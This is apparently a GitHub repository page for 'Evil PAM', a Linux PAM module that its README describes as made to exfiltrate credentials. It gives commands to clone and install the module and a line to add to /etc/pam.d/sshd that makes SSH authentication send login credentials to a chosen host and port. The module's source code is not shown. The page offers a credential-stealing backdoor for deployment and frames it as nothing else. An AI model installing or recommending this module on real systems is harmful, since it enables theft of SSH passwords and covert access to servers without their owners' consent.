Skip to content

jalvarezit/pam_evil

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Evil PAM

PAM module to exfiltrate credentials

Usage

Install the module:

apt install libpam0g-dev
git clone https://github.com/itasahobby/pam_evil.git
make install

Configure SSH to use the PAM module adding the following to /etc/pam.d/sshd:

auth       optional     pam_evil.so target=127.0.0.1 port=8888

Mentions

In colaboration with Dreg

References

About

PAM module to exfiltrate credentials

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published